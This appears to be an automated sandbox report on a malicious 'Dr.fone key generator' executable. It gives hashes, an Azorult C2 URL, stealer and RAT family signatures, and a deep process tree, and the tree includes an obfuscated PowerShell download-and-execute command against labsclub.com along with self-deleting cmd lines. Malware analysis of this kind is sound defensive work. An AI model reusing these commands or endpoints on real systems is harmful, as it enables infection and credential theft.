Analysis

  • max time kernel
    57s
  • max time network
    600s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    09-04-2021 04:58

General

  • Target

    Wondershare.Dr.fone.For.5.5.0.key.generator.exe

  • Size

    5.3MB

  • MD5

    ee3d202cf87ebeed275eb389dc9fb282

  • SHA1

    77b43986b0a65383633fcc54d146bf994c308fec

  • SHA256

    15c443dfde4c00737abf81a083011b52f9b7d96a73d6d52692c6de5cdab3afa5

  • SHA512

    0a6e89a80e287ab0132938296f01654e99c16e63923f27bd5722c205564cd2e9adfca1325d271aab857526678a061e12cdc4882e37dfb6a695f33795d97417c0

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 57 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 40 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 53 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 9 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Runs ping.exe 1 TTPs 7 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 35 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
      PID:944
      • C:\Users\Admin\AppData\Roaming\bawujib
        C:\Users\Admin\AppData\Roaming\bawujib
        2⤵
          PID:7572
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Themes
        1⤵
          PID:1296
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2156
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2496
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2444
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2428
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2248
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                  1⤵
                    PID:1912
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                    1⤵
                      PID:1424
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                      1⤵
                        PID:1236
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1084
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:992
                          • C:\Users\Admin\AppData\Local\Temp\Wondershare.Dr.fone.For.5.5.0.key.generator.exe
                            "C:\Users\Admin\AppData\Local\Temp\Wondershare.Dr.fone.For.5.5.0.key.generator.exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2736
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3888
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                keygen-pr.exe -p83fsase3Ge
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:752
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of WriteProcessMemory
                                  PID:4056
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                    C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                    5⤵
                                    • Executes dropped EXE
                                    PID:3588
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                keygen-step-1.exe
                                3⤵
                                • Executes dropped EXE
                                PID:3628
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                keygen-step-3.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:804
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2212
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 1.1.1.1 -n 1 -w 3000
                                    5⤵
                                    • Runs ping.exe
                                    PID:940
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                keygen-step-4.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:2924
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:1932
                                  • C:\Users\Admin\AppData\Local\Temp\6ZHEVQX7RA\multitimer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\6ZHEVQX7RA\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                    5⤵
                                    • Executes dropped EXE
                                    • Maps connected drives based on registry
                                    • Drops file in Windows directory
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2000
                                    • C:\Users\Admin\AppData\Local\Temp\6ZHEVQX7RA\multitimer.exe
                                      "C:\Users\Admin\AppData\Local\Temp\6ZHEVQX7RA\multitimer.exe" 1 3.1617944334.606fdf0ec15e4 101
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:4160
                                      • C:\Users\Admin\AppData\Local\Temp\6ZHEVQX7RA\multitimer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\6ZHEVQX7RA\multitimer.exe" 2 3.1617944334.606fdf0ec15e4
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks for any installed AV software in registry
                                        PID:4528
                                        • C:\Users\Admin\AppData\Local\Temp\irdqyophibo\lnaf1xtpisy.exe
                                          "C:\Users\Admin\AppData\Local\Temp\irdqyophibo\lnaf1xtpisy.exe" /VERYSILENT
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2520
                                          • C:\Users\Admin\AppData\Local\Temp\is-OVTHU.tmp\lnaf1xtpisy.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-OVTHU.tmp\lnaf1xtpisy.tmp" /SL5="$4020A,140785,56832,C:\Users\Admin\AppData\Local\Temp\irdqyophibo\lnaf1xtpisy.exe" /VERYSILENT
                                            9⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Drops file in Program Files directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SetWindowsHookEx
                                            PID:5148
                                            • C:\Users\Admin\AppData\Local\Temp\is-CNAV0.tmp\apipostback.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-CNAV0.tmp\apipostback.exe" adan adan
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of SetWindowsHookEx
                                              PID:5308
                                              • C:\Users\Admin\AppData\Local\Temp\9QdcNxcVk.exe
                                                "C:\Users\Admin\AppData\Local\Temp\9QdcNxcVk.exe"
                                                11⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:6948
                                                • C:\Windows\SysWOW64\dllhost.exe
                                                  "C:\Windows\System32\dllhost.exe"
                                                  12⤵
                                                    PID:7148
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Palpitante.vss
                                                    12⤵
                                                      PID:6224
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\System32\cmd.exe
                                                        13⤵
                                                          PID:6648
                                                          • C:\Windows\SysWOW64\findstr.exe
                                                            findstr /V /R "^hYhUEypRvrIVGeWexnSyxdOkyRxtTbbAOvLruOoDuUdZgmuOlpmJIwOXpeOMLyYZGoilsTWGdgZmqPWFKFTKXNRNHOUr$" Piacerebbe.vss
                                                            14⤵
                                                              PID:2544
                                                            • C:\Users\Admin\AppData\Roaming\qJsPetsUbKut\Sospettoso.exe.com
                                                              Sospettoso.exe.com j
                                                              14⤵
                                                                PID:4480
                                                                • C:\Users\Admin\AppData\Roaming\qJsPetsUbKut\Sospettoso.exe.com
                                                                  C:\Users\Admin\AppData\Roaming\qJsPetsUbKut\Sospettoso.exe.com j
                                                                  15⤵
                                                                    PID:5240
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 127.0.0.1 -n 30
                                                                  14⤵
                                                                  • Runs ping.exe
                                                                  PID:6012
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                            11⤵
                                                              PID:5640
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                12⤵
                                                                  PID:6352
                                                        • C:\Users\Admin\AppData\Local\Temp\lm1vylvazmq\Setup3310.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\lm1vylvazmq\Setup3310.exe" /Verysilent /subid=577
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5160
                                                          • C:\Users\Admin\AppData\Local\Temp\is-TH2R6.tmp\Setup3310.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-TH2R6.tmp\Setup3310.tmp" /SL5="$60068,138429,56832,C:\Users\Admin\AppData\Local\Temp\lm1vylvazmq\Setup3310.exe" /Verysilent /subid=577
                                                            9⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5944
                                                            • C:\Users\Admin\AppData\Local\Temp\is-633TR.tmp\Setup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-633TR.tmp\Setup.exe" /Verysilent
                                                              10⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5404
                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                                                11⤵
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:2372
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  12⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5688
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  12⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:6936
                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                                11⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:5732
                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                                                11⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:5608
                                                                • C:\Users\Admin\AppData\Roaming\61ttydt76ezd6qd6fq7f7qfdqtyqdgxxa\pspx.exe
                                                                  "C:\Users\Admin\AppData\Roaming\61ttydt76ezd6qd6fq7f7qfdqtyqdgxxa\pspx.exe"
                                                                  12⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:4628
                                                                  • C:\Users\Admin\AppData\Roaming\61ttydt76ezd6qd6fq7f7qfdqtyqdgxxa\pspx.exe
                                                                    "C:\Users\Admin\AppData\Roaming\61ttydt76ezd6qd6fq7f7qfdqtyqdgxxa\pspx.exe"
                                                                    13⤵
                                                                      PID:576
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im pspx.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\61ttydt76ezd6qd6fq7f7qfdqtyqdgxxa\pspx.exe" & del C:\ProgramData\*.dll & exit
                                                                        14⤵
                                                                          PID:7220
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /im pspx.exe /f
                                                                            15⤵
                                                                            • Kills process with taskkill
                                                                            PID:1268
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout /t 6
                                                                            15⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:7508
                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                                    11⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:864
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                      12⤵
                                                                        PID:6040
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                          13⤵
                                                                          • Loads dropped DLL
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:5848
                                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                                      11⤵
                                                                      • Executes dropped EXE
                                                                      PID:5108
                                                                      • C:\Users\Admin\AppData\Local\Temp\QHY4MD30II\multitimer.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\QHY4MD30II\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                                        12⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Windows directory
                                                                        PID:1148
                                                                        • C:\Users\Admin\AppData\Local\Temp\QHY4MD30II\multitimer.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\QHY4MD30II\multitimer.exe" 1 3.1617944373.606fdf354dd4f 103
                                                                          13⤵
                                                                            PID:6428
                                                                            • C:\Users\Admin\AppData\Local\Temp\QHY4MD30II\multitimer.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\QHY4MD30II\multitimer.exe" 2 3.1617944373.606fdf354dd4f
                                                                              14⤵
                                                                                PID:6492
                                                                                • C:\Users\Admin\AppData\Local\Temp\2uodjf0flx0\Setup3310.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\2uodjf0flx0\Setup3310.exe" /Verysilent /subid=577
                                                                                  15⤵
                                                                                    PID:7204
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-LLUH8.tmp\Setup3310.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-LLUH8.tmp\Setup3310.tmp" /SL5="$50474,138429,56832,C:\Users\Admin\AppData\Local\Temp\2uodjf0flx0\Setup3310.exe" /Verysilent /subid=577
                                                                                      16⤵
                                                                                        PID:7276
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-G5CG2.tmp\Setup.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-G5CG2.tmp\Setup.exe" /Verysilent
                                                                                          17⤵
                                                                                            PID:8044
                                                                                      • C:\Users\Admin\AppData\Local\Temp\g0kqo3dqspl\app.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\g0kqo3dqspl\app.exe" /8-23
                                                                                        15⤵
                                                                                          PID:7268
                                                                                          • C:\Users\Admin\AppData\Local\Temp\g0kqo3dqspl\app.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\g0kqo3dqspl\app.exe" /8-23
                                                                                            16⤵
                                                                                              PID:736
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jjhr5n2shuv\vpn.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\jjhr5n2shuv\vpn.exe" /silent /subid=482
                                                                                            15⤵
                                                                                              PID:7320
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-IEJ8O.tmp\vpn.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-IEJ8O.tmp\vpn.tmp" /SL5="$2055C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jjhr5n2shuv\vpn.exe" /silent /subid=482
                                                                                                16⤵
                                                                                                  PID:7620
                                                                                              • C:\Users\Admin\AppData\Local\Temp\3efzqrevmfc\wucsbbpzqo1.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\3efzqrevmfc\wucsbbpzqo1.exe" /ustwo INSTALL
                                                                                                15⤵
                                                                                                  PID:7444
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "wucsbbpzqo1.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3efzqrevmfc\wucsbbpzqo1.exe" & exit
                                                                                                    16⤵
                                                                                                      PID:2544
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im "wucsbbpzqo1.exe" /f
                                                                                                        17⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:7636
                                                                                            • C:\Users\Admin\AppData\Local\Temp\R53Y78733L\setups.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\R53Y78733L\setups.exe" ll
                                                                                              12⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:6204
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-3KCH9.tmp\setups.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-3KCH9.tmp\setups.tmp" /SL5="$202C2,1845714,55808,C:\Users\Admin\AppData\Local\Temp\R53Y78733L\setups.exe" ll
                                                                                                13⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks computer location settings
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:6408
                                                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                            11⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:5020
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-MNQSU.tmp\lylal220.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-MNQSU.tmp\lylal220.tmp" /SL5="$304A8,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                              12⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4788
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-QKR67.tmp\ysAGEL.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-QKR67.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                                                13⤵
                                                                                                • Drops file in Drivers directory
                                                                                                • Executes dropped EXE
                                                                                                PID:3628
                                                                                                • C:\Program Files\Mozilla Firefox\MQFYSVATCI\irecord.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\MQFYSVATCI\irecord.exe" /VERYSILENT
                                                                                                  14⤵
                                                                                                    PID:6792
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2UTAH.tmp\irecord.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2UTAH.tmp\irecord.tmp" /SL5="$2036E,5922518,66560,C:\Program Files\Mozilla Firefox\MQFYSVATCI\irecord.exe" /VERYSILENT
                                                                                                      15⤵
                                                                                                        PID:7016
                                                                                                        • C:\Program Files (x86)\i-record\i-record.exe
                                                                                                          "C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                          16⤵
                                                                                                            PID:4344
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\47-8b952-bdd-0cfa8-189c66c5eb41d\SHuxylomutae.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\47-8b952-bdd-0cfa8-189c66c5eb41d\SHuxylomutae.exe"
                                                                                                        14⤵
                                                                                                          PID:6876
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\48-c7a3e-e5f-d6e84-aae8a780fb07a\Qegufaenyde.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\48-c7a3e-e5f-d6e84-aae8a780fb07a\Qegufaenyde.exe"
                                                                                                          14⤵
                                                                                                            PID:6940
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pvc1lyyz.koc\google-game.exe & exit
                                                                                                              15⤵
                                                                                                                PID:7764
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\pvc1lyyz.koc\google-game.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\pvc1lyyz.koc\google-game.exe
                                                                                                                  16⤵
                                                                                                                    PID:1664
                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                      17⤵
                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                      PID:3552
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hb0lqhog.d2o\jg8_8qyu.exe & exit
                                                                                                                  15⤵
                                                                                                                    PID:8056
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\hb0lqhog.d2o\jg8_8qyu.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\hb0lqhog.d2o\jg8_8qyu.exe
                                                                                                                      16⤵
                                                                                                                        PID:6980
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\coygyjhm.oe4\wwfvd.exe & exit
                                                                                                                      15⤵
                                                                                                                        PID:8132
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\coygyjhm.oe4\wwfvd.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\coygyjhm.oe4\wwfvd.exe
                                                                                                                          16⤵
                                                                                                                            PID:5744
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\coygyjhm.oe4\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                              17⤵
                                                                                                                                PID:5728
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im wwfvd.exe /f
                                                                                                                                  18⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:5216
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout /t 6
                                                                                                                                  18⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:7220
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2vykvuiz.nd2\askinstall31.exe & exit
                                                                                                                            15⤵
                                                                                                                              PID:7752
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2vykvuiz.nd2\askinstall31.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2vykvuiz.nd2\askinstall31.exe
                                                                                                                                16⤵
                                                                                                                                  PID:6536
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                    17⤵
                                                                                                                                      PID:4060
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        18⤵
                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5936
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                        18⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:6676
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iejytd3c.ubg\toolspab1.exe & exit
                                                                                                                                  15⤵
                                                                                                                                    PID:4672
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\iejytd3c.ubg\toolspab1.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\iejytd3c.ubg\toolspab1.exe
                                                                                                                                      16⤵
                                                                                                                                        PID:4140
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\iejytd3c.ubg\toolspab1.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\iejytd3c.ubg\toolspab1.exe
                                                                                                                                          17⤵
